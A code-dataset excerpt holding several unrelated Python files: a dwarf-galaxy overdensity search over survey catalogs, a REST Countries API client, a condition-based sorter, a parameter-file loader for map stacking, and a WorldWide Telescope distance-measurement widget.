np.float(sys.argv[2])\n\n # Convert healpix to ra/dec\n nside = np.int(64)\n ra0, dec0 = hp.pix2ang(nside,hpix,lonlat=True)\n\n # Output name\n outbase = str(hpix)+'_'+str(radius)+'_'+str(version)\n outdir = dir+str(hpix/1000)+'/'+str(hpix)+'/'\n if not os.path.exists(outdir): # make output directory if necessary\n os.makedirs(outdir)\n outfile = outdir+outbase+'_peaks.fits'\n donefile = outdir+outbase+'.done'\n\n # Check if the \"done\" file already exists\n if 
os.path.exists(donefile):\n print('This healpix was already done')\n sys.exit()\n\n # Set up logging to screen and logfile\n #logFormatter = logging.Formatter(\"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\")\n logFormatter = logging.Formatter(\"%(asctime)s [%(levelname)-5.5s] %(message)s\")\n rootLogger = logging.getLogger()\n\n #logfile = tmpdir+\"/\"+base+\".log\"\n logfile = outdir+outbase+\".log\"\n # Delete file if it exists\n if os.path.exists(logfile):\n os.remove(logfile)\n #fileHandler = logging.FileHandler(\"{0}/{1}.log\".format(logPath, fileName))\n fileHandler = logging.FileHandler(logfile)\n fileHandler.setFormatter(logFormatter)\n rootLogger.addHandler(fileHandler)\n\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logFormatter)\n rootLogger.addHandler(consoleHandler)\n #rootLogger.setLevel(logging.NOTSET)\n rootLogger.setLevel(logging.INFO)\n\n rootLogger.info(\"Searching for overdensities at RA=\"+str(ra0)+\" DEC=\"+str(dec0)+\" Radius=\"+str(radius)+\" on host=\"+host)\n #rootLogger.info(\" Temporary directory is: \"+tmpdir)\n\n\n # Either get token for anonymous user\n token = ac.login('anonymous')\n\n # Authenticated users please uncomment the next line\n #token = ac.login(input(\"Enter user name: \"),getpass(\"Enter password: \"))\n\n #df0 = getData(ra0,dec0,radius=0.01)\n #print(str(len(df0))+' objects found')\n bcatall = getDataCuts(ra0,dec0,radius=radius,colcutlo=-0.2,colcuthi=0.8,classcut=0.6,fwhmcut=1.5,errcut=0.1)\n rootLogger.info(str(len(bcatall))+' objects found')\n if len(bcatall) == 0:\n rootLogger.info('No data')\n # Create done file\n f = open(donefile,'w')\n f.write(host)\n f.close()\n sys.exit()\n \n # Get coverage information\n cov = getCovData(ra0,dec0,radius=radius,columns='ra,dec,pix,pix128,gcoverage,gdepth,rcoverage,rdepth')\n rootLogger.info(str(len(cov))+' coverage pixels returned')\n\n # Create the healpix map\n #NSIDE = 1024 #4096\n #map = np.zeros(hp.nside2npix(NSIDE),dtype='float')\n #map[:] = hp.UNSEEN # all unseen/masked to start\n #map = hp.ma(np.zeros(hp.nside2npix(NSIDE),dtype='float'))\n #map.mask = True\n #map[:] = hp.UNSEEN\n #objpix = hp.pixelfunc.ang2pix(NSIDE,df['ra'],df['dec'],lonlat=True)\n\n\n # Make healpix density map\n #npix = hp.nside2npix(NSIDE)\n #hist,bin_edges = np.histogram(objpix,bins=npix,range=[0,npix-1])\n #ind, = np.where(hist > 0)\n #map[ind] = hist[ind]\n #map[ind].mask = False\n\n # Downgrade the coverage map resolution\n #gcov_map2 = hp.pixelfunc.ud_grade(gcov_map,1024)\n #rcov_map2 = hp.pixelfunc.ud_grade(rcov_map,1024)\n\n #%%time\n ## 20 and 2 arcmin\n #smap1 = hp.sphtfunc.smoothing(map,fwhm=(20./60.)*(3.14159/180.),iter=1,lmax=2*NSIDE)\n #bmap1 = hp.sphtfunc.smoothing(map,fwhm=(120./60.)*(3.14159/180.),iter=1,lmax=2*NSIDE)\n #smmap1 = smap1-bmap1\n ##smmap2 = hp.sphtfunc.smoothing(map2,fwhm=(20./60.)*(3.14159/180.))\n\n # Run dwarf filter\n small_k, big_k = 2., 20. 
# kernel sizes in arcminutes\n try:\n raw, extent, delta, clipped, dsigma = dwarf_filter(bcatall['ra'],bcatall['dec'],fwhm_small=small_k,fwhm_big=big_k)\n except:\n rootLogger.info('Problems with dwarf filter')\n # Create done file\n f = open(donefile,'w')\n f.write(host)\n f.close()\n sys.exit()\n\n # find peaks\n small_k = 2.0\n mn, med, std = stats.sigma_clipped_stats(clipped,sigma=3.0,iters=5)\n nsigma = 2.5\n tbl = find_peaks(clipped,med+nsigma,box_size=small_k*2)\n rootLogger.info(str(len(tbl))+' peaks found')\n if len(tbl) == 0:\n # Create done file\n f = open(donefile,'w')\n f.write(host)\n f.close()\n sys.exit()\n\n # add ra & dec positions of peaks found\n a, b = extent[:2]\n xvec = np.arange(a,b,(b-a)/clipped.shape[1])\n a, b = extent[2:]\n yvec = np.arange(a,b,(b-a)/clipped.shape[0])\n\n # Not enough pixels in density image\n if (len(xvec)<2) | (len(yvec)<2):\n rootLogger.info('Not enough pixels in the density map')\n # Create done file\n f = open(donefile,'w')\n f.write(host)\n f.close()\n sys.exit() \n\n\n tbl['ra'] = xvec[tbl['x_peak']]\n tbl['dec'] = yvec[-tbl['y_peak']-1]\n #print(tbl)\n rootLogger.info(str(tbl))\n\n # Make sky map of overdensities\n fig, ax = plt.subplots(figsize=(8,8))\n im = plt.imshow(clipped)\n ax.scatter(tbl['x_peak'],tbl['y_peak'],marker='s',s=tbl['peak_value']*40,c='none',edgecolors='w',lw=3) # keeps writing to previous ax\n plt.xlabel('pixel')\n plt.ylabel('pixel')\n plt.title('%d overdensities, RA=%f DEC=%f' % (len(tbl), ra0, dec0))\n plt.colorbar(label='relative spatial density after convolution');\n plt.savefig(outdir+outbase+'_skymap_peaks.png')\n\n # Create output table\n dt = np.dtype([('id',np.str_,20),('hpix',int),('num',int),('x_peak',int),('y_peak',int),('peak_value',float),('ra_peak',float),('dec_peak',float),\n ('x_centroid',float),('y_centroid',float),('ra',float),('dec',float),('asemi',float),('bsemi',float),('theta',float),\n ('back_color',float),('back_mag',float),('back_fwhm',float),('back_class_star',float),('back_gdepth',float),('back_rdepth',float),\n ('nobj',int),('color',float),('mag',float),('fwhm',float),('class_star',float),('nblue',int),('blue_mag',float),\n ('gdepth',float),('rdepth',float),\n ('pmra',float),('pmdec',float),('pmraerr',float),('pmdecerr',float),('nexp',int),('deltamjd',float)])\n peaks = None\n npeaks = len(tbl)\n if npeaks > 0:\n peaks = np.zeros(npeaks,dtype=dt)\n peaks['hpix'] = hpix\n peaks['num'] = np.arange(npeaks)+1\n tempid = np.char.add(peaks['hpix'].astype(str),'.')\n peaks['id'] = np.char.add(tempid,peaks['num'].astype(str))\n # Copying info in tbl\n peaks['x_peak'] = tbl['x_peak']\n peaks['y_peak'] = tbl['y_peak']\n peaks['peak_value'] = tbl['peak_value']\n peaks['ra_peak'] = tbl['ra']\n peaks['dec_peak'] = tbl['dec']\n # Add the \"background\" values\n columns = 'ra,dec,gmag,rmag,fwhm,class_star'\n catall = getDataCuts(ra0,dec0,radius=radius,columns=columns)\n rootLogger.info(str(len(catall))+' total objects found')\n gdcol = (catall['gmag'] < 50) & (catall['rmag'] < 50)\n if np.sum(gdcol) > 0:\n peaks['back_color'] = np.median(catall['gmag'][gdcol]-catall['rmag'][gdcol])\n else:\n peaks['back_color'] = 999999.\n gdmag = (catall['gmag'] < 50)\n if np.sum(gdmag) > 0:\n peaks['back_mag'] = np.median(catall['gmag'][gdmag])\n else:\n peaks['back_mag'] = 999999.\n peaks['back_fwhm'] = np.median(catall['fwhm'])\n peaks['back_class_star'] = np.median(catall['class_star'])\n # Depth information\n gdgdepth = (cov['gdepth'] < 50) & (cov['gdepth'] > 0)\n if np.sum(gdgdepth) > 0:\n peaks['back_gdepth'] = 
np.median(cov['gdepth'][gdgdepth])\n else:\n peaks['back_gdepth'] = 999999.\n gdrdepth = (cov['rdepth'] < 50) & (cov['rdepth'] > 0)\n if np.sum(gdrdepth) > 0:\n peaks['back_rdepth'] = np.median(cov['rdepth'][gdrdepth])\n else:\n peaks['back_rdepth'] = 999999.\n \n\n # Loop over the peaks and download data\n for i in range(npeaks):\n peaks0 = peaks[i]\n rootLogger.info(\" i=\"+str(i+1)+\" RA=\"+str(peaks0['ra_peak'])+\" DEC=\"+str(peaks0['dec_peak']))\n \n # Convert X/Y to RA/DEC\n #cat0 = getDataCuts(peaks0['ra'],peaks0['dec'],radius=0.1,classcut=0.6,fwhmcut=1.5)\n columns = 'ra,dec,pmra,pmdec,pmraerr,pmdecerr,ndet,deltamjd,gmag,rmag,fwhm,class_star'\n cat0 = getDataCuts(peaks0['ra_peak'],peaks0['dec_peak'],radius=0.1,columns=columns)\n print(str(len(cat0))+' objects found')\n\n # Measure the morphology around the overdensity\n shp = clipped.shape\n x0 = np.int(np.floor(peaks0['x_peak']-10))\n if x0 < 0: x0=0\n x1 = np.int(np.ceil(peaks0['x_peak']+10))\n if x1 > (shp[1]-1): x1=(shp[1]-1) # X is 2nd dimension\n y0 = np.int(np.floor(peaks0['y_peak']-10))\n if y0 < 0: y0=0\n y1 = np.int(np.ceil(peaks0['y_peak']+10))\n if y1 > (shp[0]-1): y1=(shp[0]-1) # Y is 1st dimension\n clipped0 = clipped[y0:y1+1,x0:x1+1]\n props = data_properties(clipped0)\n pcolumns = ['id', 'xcentroid', 'ycentroid', 'semimajor_axis_sigma','semiminor_axis_sigma', 'orientation']\n # semi axes in pixels and orientation in radians\n # 1 pixel is 1 armcin, good unit to use\n pcat = props.to_table(columns=pcolumns)\n peaks[i]['x_centroid'] = props['xcentroid'].value+x0\n peaks[i]['y_centroid'] = props['ycentroid'].value+y0\n peaks[i]['asemi'] = props['semimajor_axis_sigma'].value # pixel=arcmin\n peaks[i]['bsemi'] = props['semiminor_axis_sigma'].value # pixel=arcmin\n peaks[i]['theta'] = np.rad2deg(props['orientation'].value)\n # ra & dec positions of centroid\n # use xvec/yvec defined above\n xf = extrap1d(interp1d(np.arange(len(xvec)),xvec)) # function to interpolate x\n peaks[i]['ra'] = xf([peaks[i]['x_centroid']])\n yf = extrap1d(interp1d(np.arange(len(yvec)),yvec)) # function to interpolate y\n peaks[i]['dec'] = np.float( yf([len(yvec)-peaks[i]['x_centroid']-1]) )\n #peaks[i]['ra'] = xvec[peaks[i]['x_centroid']]\n #peaks[i]['dec'] = yvec[-peaks[i]['y_centroid']-1]\n\n # Add the median values for this peak\n gdcol = (cat0['gmag'] < 50) & (cat0['rmag'] < 50)\n if np.sum(gdcol) > 0:\n peaks[i]['color'] = np.median(cat0['gmag'][gdcol]-cat0['rmag'][gdcol])\n else:\n peaks[i]['color'] = 999999.\n gdmag = (cat0['gmag'] < 50)\n if np.sum(gdmag) > 0:\n peaks[i]['mag'] = np.median(cat0['gmag'][gdmag])\n else:\n peaks[i]['mag'] = 999999.\n peaks[i]['fwhm'] = np.median(cat0['fwhm'])\n peaks[i]['class_star'] = np.median(cat0['class_star'])\n peaks[i]['nobj'] = len(cat0)\n gdpm = ((np.abs(cat0['pmra']) < 1e5) & np.isfinite(cat0['pmra']) &\n (np.abs(cat0['pmdec']) < 1e5) & np.isfinite(cat0['pmdec']))\n if np.sum(gdpm) > 0:\n peaks[i]['pmra'] = np.median(cat0['pmra'][gdpm])\n peaks[i]['pmdec'] = np.median(cat0['pmdec'][gdpm])\n peaks[i]['pmraerr'] = np.median(cat0['pmraerr'][gdpm]) / np.sqrt(np.sum(gdpm))\n peaks[i]['pmdecerr'] = np.median(cat0['pmdecerr'][gdpm]) / np.sqrt(np.sum(gdpm))\n peaks[i]['nexp'] = np.median(cat0['ndet'][gdpm])\n peaks[i]['deltamjd'] = np.median(cat0['deltamjd'][gdpm])\n else:\n peaks[i]['pmra'] = 999999.\n peaks[i]['pmdec'] = 999999.\n peaks[i]['pmraerr'] = 999999.\n peaks[i]['pmdecerr'] = 999999.\n peaks[i]['nexp'] = np.median(cat0['ndet'])\n peaks[i]['deltamjd'] = np.median(cat0['deltamjd'])\n # Select only 
very blue stars\n gdblue = ((cat0['gmag']-cat0['rmag']) < 0.1) & (cat0['gmag'] < 50) & (cat0['rmag'] < 50)\n peaks[i]['nblue'] = np.sum(gdblue)\n if np.sum(gdblue) > 0:\n peaks[i]['blue_mag'] = np.median(cat0['gmag'][gdblue])\n else:\n peaks[i]['blue_mag'] = 999999.\n # Get coverage information\n cov0 = getCovData(peaks0['ra'],peaks0['dec'],radius=0.1,columns='ra,dec,pix,pix128,gcoverage,gdepth,rcoverage,rdepth')\n gdgdepth = (cov0['gdepth'] < 50) & (cov0['gdepth'] > 0)\n if np.sum(gdgdepth) > 0:\n peaks[i]['gdepth'] = np.median(cov0['gdepth'][gdgdepth])\n else:\n peaks[i]['gdepth'] = 999999.\n gdrdepth = (cov0['rdepth'] < 50) & (cov0['rdepth'] > 0)\n if np.sum(gdrdepth) > 0:\n peaks[i]['rdepth'] = np.median(cov0['rdepth'][gdrdepth])\n else:\n peaks[i]['rdepth'] = 999999.\n\n # Make sky map with THIS overdensity highlighted\n fig, ax = plt.subplots(figsize=(8,8))\n im = plt.imshow(clipped)\n ax.scatter(peaks['x_peak'],peaks['y_peak'],marker='s',s=peaks['peak_value']*40,c='none',edgecolors='w',lw=3) # keeps writing to previous ax\n ax.scatter(peaks0['x_peak'],peaks0['y_peak'],marker='s',s=peaks0['peak_value']*40,c='none',edgecolors='y',lw=3)\n plt.xlabel('pixel')\n plt.ylabel('pixel')\n plt.title('%d overdensities, RA=%f DEC=%f' % (npeaks, ra0, dec0))\n plt.colorbar(label='relative spatial density after convolution');\n plt.savefig(outdir+outbase+'_skymap_peak'+str(i+1)+'.png')\n\n # Make CMD for this overdensity\n fig = plt.figure(figsize=(8,8))\n plt.scatter(cat0['gmag']-cat0['rmag'],cat0['gmag'],marker='.',s=10, alpha=0.8)\n plt.xlabel('g-r')\n plt.ylabel('g')\n xlim=(-1,2)\n ylim=(25.2,14)\n plt.xlim(xlim)\n plt.ylim(ylim)\n plt.title('Overdensity CMD, %d objects RA=%f DEC=%f' % (len(cat0), peaks0['ra'], peaks0['dec']))\n plt.savefig(outdir+outbase+'_cmd'+str(i+1)+'.png')\n\n # Make CMD for this overdensity ONLY GALAXIES\n gals = cat0['class_star'] < 0.1\n fig = plt.figure(figsize=(8,8))\n plt.scatter(cat0[gals]['gmag']-cat0[gals]['rmag'],cat0[gals]['gmag'],marker='.',s=10, alpha=0.8)\n plt.xlabel('g-r')\n plt.ylabel('g')\n xlim=(-1,2)\n ylim=(25.2,14)\n plt.xlim(xlim)\n plt.ylim(ylim)\n plt.title('Overdensity CMD Galaxies, %d objects RA=%f DEC=%f' % (len(cat0), peaks0['ra'], peaks0['dec']))\n plt.savefig(outdir+outbase+'_cmd'+str(i+1)+'_gals.png')\n\n plt.close('all') # close all figures\n \n # Save the table\n rootLogger.info(\"Saving info to \"+outdir+outbase+'_peaks.fits')\n #peaks.write(outdir+outbase+'_peaks.fits')\n Table(peaks).write(outfile)\n\n # Create done file\n f = open(donefile,'w')\n f.write(host)\n f.close()\n","repo_name":"dnidever/nscdwarfs","sub_path":"python/nsc_dwarfs_hpix.py","file_name":"nsc_dwarfs_hpix.py","file_ext":"py","file_size_in_byte":25004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"37239828435","text":"import requests\nimport json\n\n\nclass Countries:\n\n def __init__(self, url):\n self.url = url\n\n def get_all(self):\n r = requests.get(self.url + '/rest/v2/all?fields=name;capital;alpha3Code')\n value = json.loads(r.text)\n if r.status_code == 200:\n for i in range(len(value)):\n print(str(i + 1) + '. 
Country: ' + value[i].get(\"name\") + '[' + value[i].get(\n \"alpha3Code\") + ']' + '; Capital: ', value[i].get(\"capital\"))\n else:\n print('API Returns an error')\n\n def get_capital_by_index(self, index):\n r = requests.get(self.url + '/rest/v2/all?fields=name;capital;alpha3Code')\n value = json.loads(r.text)\n if r.status_code == 200:\n return value[index - 1].get(\"capital\")\n else:\n return 'API Returns an error: Index must be between 1 and 250'\n\n def get_country_by_index(self, index):\n r = requests.get(self.url + '/rest/v2/all?fields=name;alpha3Code')\n value = json.loads(r.text)\n if r.status_code == 200:\n return value[index - 1].get(\"name\")\n else:\n return 'API Returns an error: Index must be between 1 and 250'\n\n def get_capital_by_code(self, code):\n r = requests.get(self.url + '/rest/v2/alpha/' + code + '?fields=capital')\n value = json.loads(r.text)\n if r.status_code == 200:\n return value.get(\"capital\")\n else:\n return 'API Returns an error: Country Code does not exist'\n\n\n def get_capital_by_country_name(self, name):\n r = requests.get(self.url + '/rest/v2/name/' + name + '?fields=capital')\n value = json.loads(r.text)\n if r.status_code == 200:\n return value[0].get(\"capital\")\n else:\n return 'API Returns an error: Country Name does not exist'\n\n","repo_name":"alextilov/REST_01","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"24500098720","text":"def parcer_condition(cond: str) -> str:\n \"\"\"Проверка валидности условия.\"\"\"\n operators = [] # Список хранения операторов\n objects = [] # Список хранения объектов\n\n cond = cond.replace(' ', '') # Избавляемся от пробелов\n finded_operator = ''\n flag = 0\n len_cond = len(cond)\n\n # Формируем списки объектов и операторов. 
Проверяем строгость условий.\n for i in range(len_cond):\n\n if cond[i] == '<' or cond[i] == '>':\n\n if finded_operator == '':\n finded_operator = cond[i]\n\n if cond[i] == finded_operator:\n operators.append(cond[i])\n objects.append(cond[flag:i])\n else:\n return False\n\n flag = i+1\n\n elif cond[i] == '=':\n return False\n\n # Добавляется последний эллемент\n objects.append(cond[flag:len_cond])\n\n # Если не нашелся ни один оператор сравнения\n if finded_operator == '' or '' in objects:\n return False\n\n # Все условия определенны однозначно\n if len(set(objects)) - len(operators) != 1:\n return False\n\n parc_len = len(objects)\n dic = {}\n\n if finded_operator == '<':\n for i in range(parc_len):\n dic[objects[i]] = i\n\n else:\n for i in range(parc_len):\n dic[objects[i]] = parc_len - i\n\n return dic\n\n\ndef check_input(data: str, cond: str) -> list:\n \"\"\"Проверка входных параметров на основании условий.\"\"\"\n\n condition = parcer_condition(cond)\n\n if not condition:\n print('Ошибка создания условия')\n return False\n # Если словарь создан, Забираем ключи и разбиваем входную строку\n\n if ' ' not in data:\n print('Нет объектов для сорировки')\n return False\n\n parcer_str = data.split(' ')\n\n # Избавляемся от лишних пробелов\n\n parcer_str = [elem for elem in parcer_str if elem != '']\n\n if len(parcer_str) <= 1:\n return False\n\n keys = condition.keys()\n\n # Проверяем, все ли эллементы входной строки мы сможет отсортировать\n for i in parcer_str:\n if i not in keys:\n print('Полученные данные не удовлетворяют условиям сортировки')\n return False\n\n result = [parcer_str, condition]\n return result\n\n\ndef sort_input(data: str, cond: str) -> str:\n \"\"\"Основная функция сортировки входных данных по условию.\"\"\"\n temp_list = []\n sorted_str = ''\n input = check_input(data, cond)\n\n if not input:\n return False\n\n objects = input[0] # Входные данные\n condition = input[1] # Словарь условий\n\n # Заменяем буквы их весами\n for i in objects:\n temp_list.append(condition.get(i))\n\n # Сортируем\n temp_list.sort()\n # Делаем обратную замену от цифр к буквам и соединяем в строку\n for i in range(len(temp_list)):\n for key, value in condition.items():\n if temp_list[i] == value:\n if i == len(temp_list)-1:\n sorted_str += str(key)\n else:\n sorted_str += str(key)+' '\n\n return sorted_str\n\n\ncondition = 'З<С<К'\ninput = 'С С З С К З З З К К С З С С К З'\nprint(sort_input(input, condition))\n","repo_name":"NiMoskv/For_Automiq","sub_path":"sortirovka/sort_sequency.py","file_name":"sort_sequency.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"19644102534","text":"import numpy as np\nimport ConfigParser\nimport os\nimport logging\n\ndef get_params(param_file_path):\n\n 'Turn parameter file into parameter dictionary'\n\n config = ConfigParser.SafeConfigParser()\n config.read(param_file_path)\n\n # Get dictionaries from config object\n raw_params = dict(config.items('general'))\n raw_cats_params = dict(config.items('catalogs_to_stack'))\n raw_cats_path_params = dict(config.items('catalog_path'))\n raw_cats_file_params = dict(config.items('catalog_file'))\n raw_binning_params = dict(config.items('binning'))\n raw_maps_params = dict(config.items('maps_to_stack'))\n raw_map_path_params = dict(config.items('map_path'))\n raw_map_file_params = dict(config.items('map_file'))\n raw_noise_file_params = dict(config.items('noise_file'))\n raw_beam_params = 
dict(config.items('beams'))\n raw_colour_correction_params = dict(config.items('color_correction'))\n # Convert raw config dictionary to organisex dictionary params\n\n params = get_general_params(raw_params)\n params['map_files'] = get_maps_params(raw_maps_params,raw_map_path_params,raw_map_file_params)\n params['noise_files'] = get_maps_params(raw_maps_params,raw_map_path_params,raw_noise_file_params)\n params['wavelength'] = get_wavelength_params(raw_maps_params)\n params['psfs'] = get_beams_params(raw_maps_params,raw_beam_params)\n params['colour_correction'] = get_colour_correction_params(raw_maps_params,raw_colour_correction_params)\n params['catalogs'] = get_catalogs_params(raw_cats_params,raw_cats_path_params,raw_cats_file_params)\n params['bins'] = get_binning_params(raw_binning_params)\n params['library_keys'] = params['map_files'].keys()\n\n logging.info('------PARAMETER VALUES------')\n\n return params\n\ndef get_general_params(raw_params):\n\n params = {}\n params['zkey'] = raw_params['zkey']\n params['mkey'] = raw_params['mkey']\n params['ra_key'] = raw_params['ra_key']\n params['dec_key'] = raw_params['dec_key']\n try:\n params['save_bin_ids'] = string_is_true(raw_params['save_bin_ids'])\n except:\n params['save_bin_ids'] = True\n\n return params\n\ndef get_wavelength_params(raw_maps_params):\n\n wavelengths = {}\n for imap in raw_maps_params:\n if string_is_true(raw_maps_params[imap].split()[1]) == True:\n wavelengths[imap] = float(raw_maps_params[imap].split()[0])\n return wavelengths\n\n\ndef get_binning_params(raw_params):\n\n binning = {}\n z_nodes = []\n m_nodes = []\n for i in raw_params['redshift_nodes'].split():\n z_nodes.append(float(i))\n for j in raw_params['mass_nodes'].split():\n m_nodes.append(float(j))\n\n binning['z_nodes'] = z_nodes\n binning['m_nodes'] = m_nodes\n\n return binning\n\ndef get_maps_params(raw_maps_params,raw_map_path_params,raw_map_file_params):\n\n maps = {}\n\n for imap in raw_maps_params:\n if string_is_true(raw_maps_params[imap].split()[1]) == True:\n maps[imap] = raw_map_path_params[imap].split()[0] + raw_map_file_params[imap]\n\n return maps\n\ndef get_beams_params(raw_maps_params,raw_beam_params):\n psfs = {}\n\n for imap in raw_maps_params:\n if string_is_true(raw_maps_params[imap].split()[1]) == True:\n psfs[imap + '_beam_area'] = float(raw_beam_params[imap].split()[1])\n if is_float(raw_beam_params[imap].split()[0]) == True:\n psfs[imap+'_fwhm'] = float(raw_beam_params[imap].split()[0])\n else:\n psfs[imap+'_beam_file'] = raw_beam_params[imap].split()[0]\n return psfs\n\n\ndef get_colour_correction_params(raw_maps_params,raw_colour_correction_params):\n colour_correction = {}\n\n for imap in raw_maps_params:\n if string_is_true(raw_maps_params[imap].split()[1]) == True:\n colour_correction[imap+''] = float(raw_colour_correction_params[imap])\n\n return colour_correction\n\n\ndef get_catalogs_params(raw_cats_params,raw_cats_path_params,raw_cats_file_params):\n catalog = {}\n\n for cat in raw_cats_params:\n if string_is_true(raw_cats_params[cat].split()[0]) == True:\n catalog['catalog_path'] = str(raw_cats_path_params[cat].split()[0])\n catalog['catalog_file'] = str(raw_cats_file_params[cat])\n catalog['cat_name'] = str(cat)\n\n return catalog\n\ndef is_float(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\ndef string_is_true(sraw):\n\n s = sraw.lower()\n true_strings = ['true','t','yes','y','1']\n false_strings = ['false','f','no','n','0']\n if s in true_strings:\n return True\n elif s in false_strings:\n 
return False\n else:\n logging.warning('Input not recognised for parameter %s' % (key))\n logging.warning('You providedL %s' % (sraw))\n raise\n\n\n \n \n","repo_name":"samhanrahan16/Samstack","sub_path":"sams_parameters.py","file_name":"sams_parameters.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"11752457725","text":"from datetime import datetime\n\nimport astropy.units as u\nimport ipyvue as v\nimport requests\nfrom astropy.coordinates import Angle, SkyCoord\nfrom cosmicds.utils import RepeatedTimer, load_template, API_URL\nfrom ipywidgets import DOMWidget, widget_serialization\nfrom pywwt.jupyter import WWTJupyterWidget\nfrom traitlets import Instance, Bool, Float, Int, Unicode, observe, Dict\n\nfrom ...utils import GALAXY_FOV, HUBBLE_ROUTE_PATH, angle_to_json, \\\n angle_from_json\n\n\nclass DistanceTool(v.VueTemplate):\n template = load_template(\"distance_tool.vue\", __file__, traitlet=True).tag(\n sync=True)\n widget = Instance(DOMWidget, allow_none=True).tag(sync=True,\n **widget_serialization)\n measuring = Bool().tag(sync=True)\n measuredDistance = Float().tag(sync=True)\n angular_size = Instance(Angle).tag(sync=True, to_json=angle_to_json,\n from_json=angle_from_json)\n angular_height = Instance(Angle).tag(sync=True, to_json=angle_to_json,\n from_json=angle_from_json)\n height = Int().tag(sync=True)\n width = Int().tag(sync=True)\n view_changing = Bool(False).tag(sync=True)\n measuring_allowed = Bool(False).tag(sync=True)\n show_ruler = Bool(False).tag(sync=True)\n fov_text = Unicode().tag(sync=True)\n flagged = Bool(False).tag(sync=True)\n ruler_click_count = Int().tag(sync=True)\n measurement_count = Int().tag(sync=True)\n galaxy_selected = Bool(False).tag(sync=True)\n _ra = Angle(0 * u.deg)\n _dec = Angle(0 * u.deg)\n wwtStyle = Dict().tag(sync=True)\n reset_style = Bool(False).tag(sync=True)\n \n # Guard\n guard = Bool(False).tag(sync=True)\n galaxy_max_size = Angle(\"60 arcmin\") # 2 x Pinwheel galaxy (d = 7 Mpc, r = 1.7 Rmw)\n galaxy_min_size = Angle(\"6 arcsec\") # 3 x sdss resoltuion\n bad_measurement = Bool(False).tag(sync=True)\n\n UPDATE_TIME = 1 # seconds\n START_COORDINATES = SkyCoord(180 * u.deg, 25 * u.deg, frame='icrs')\n\n def __init__(self, *args, **kwargs):\n self.widget = WWTJupyterWidget(hide_all_chrome=True)\n self._setup_widget()\n self.measuring = kwargs.get('measuring', False)\n self.guard = kwargs.get('guard', False)\n self.angular_size = Angle(0, u.deg)\n self.angular_height = Angle(60, u.deg)\n self.widget._set_message_type_callback('wwt_view_state',\n self._handle_view_message)\n self.last_update = datetime.now()\n self._rt = RepeatedTimer(self.UPDATE_TIME, self._check_view_changing)\n self.update_text()\n super().__init__(*args, **kwargs)\n\n def _setup_widget(self):\n # Temp update to set background to SDSS. 
Once we remove galaxies without SDSS WWT tiles from the catalog, make background DSS again, and set wwt.foreground_opacity = 0, per Peter Williams.\n self.widget.background = 'SDSS: Sloan Digital Sky Survey (Optical)'\n self.widget.foreground = 'SDSS: Sloan Digital Sky Survey (Optical)'\n self.widget.center_on_coordinates(self.START_COORDINATES, fov= 42 * u.arcmin, #start in close enough to see galaxies\n instant=True)\n\n def reset_canvas(self):\n self.send({\"method\": \"reset\", \"args\": []})\n\n def update_text(self):\n self.send({\"method\": \"update_text\", \"args\": []})\n\n def _height_from_pixel_str(self, s):\n return int(s[:-2]) # Remove the 'px' from the end\n\n # We aren't always guaranteed to get an update from the WWT viewer\n # so every second, if the view is marked as changing, \n # we check when the last update that we got is\n # If it's more than a second old, mark the view as not changing\n def _check_view_changing(self):\n if self.view_changing:\n delta = datetime.now() - self.last_update\n if delta.total_seconds() >= self.UPDATE_TIME:\n self.view_changing = False\n\n def vue_toggle_measuring(self, _args=None):\n self.measuring = not self.measuring\n self.ruler_click_count += 1\n\n @observe('measuredDistance')\n def _on_measured_distance_changed(self, change):\n fov = self.widget.get_fov()\n widget_height = self._height_from_pixel_str(self.widget.layout.height)\n ang_size = Angle(((change[\"new\"] / widget_height) * fov))\n valid = self.validate_angular_size(ang_size, True)\n # print(ang_size, change[\"new\"], valid)\n # if valid:\n # print('valid measurement')\n self.angular_size = ang_size\n self.measurement_count += 1\n\n @observe('measuring')\n def _on_measuring_changed(self, measuring):\n if not measuring[\"new\"]:\n self.reset_canvas()\n\n @observe(\"angular_height\")\n def _on_fov_change(self, change):\n d, m, s = change[\"new\"].dms\n m = m + s / 60\n d = d + m / 60\n s = int(s)\n if d > 9.95: # to avoid edge case where you can get 10 between 10 and 11 and 10.0 from 9.95-10\n self.fov_text = f\"{d:.0f}°\"\n elif d > 0.99: # to avoid edge case where you can get 60.0 arcmin from 59.5-59.9 arcmin\n self.fov_text = f\"{d:.1f}°\"\n elif m > 9.95:\n self.fov_text = f\"{m:.0f}'\"\n elif m > 0.99:\n self.fov_text = f\"{m:.1f}'\"\n else:\n self.fov_text = f\"{s}\\\"\"\n self.update_text()\n\n def _handle_view_message(self, wwt, _updated):\n fov = Angle(self.widget.get_fov())\n center = self.widget.get_center()\n ra = Angle(center.ra)\n dec = Angle(center.dec)\n changing = not u.allclose([fov, ra, dec],\n [self.angular_height, self._ra, self._dec])\n self.angular_height = fov\n self._ra = ra\n self._dec = dec\n self.view_changing = changing\n self.last_update = datetime.now()\n\n def go_to_location(self, ra, dec, fov=GALAXY_FOV):\n coordinates = SkyCoord(ra * u.deg, dec * u.deg, frame='icrs')\n self.widget.center_on_coordinates(coordinates, fov=fov, instant=True)\n \n def reset_brightness_contrast(self):\n self.wwtStyle = {}\n # toggle reset style to trigger watch in vue\n self.reset_style = True\n self.reset_style = False\n \n def activate_guard(self):\n self.guard = True\n \n def deactivate_guard(self):\n self.guard = False\n self.bad_measurement = False\n \n def set_guard(self, max = None, min = None):\n self.activate_guard()\n self.galaxy_max_size = Angle(max) if max is not None else self.galaxy_max_size\n self.galaxy_min_size = Angle(min) if min is not None else self.galaxy_min_size\n \n def validate_angular_size(self, angular_size, check = True):\n if not 
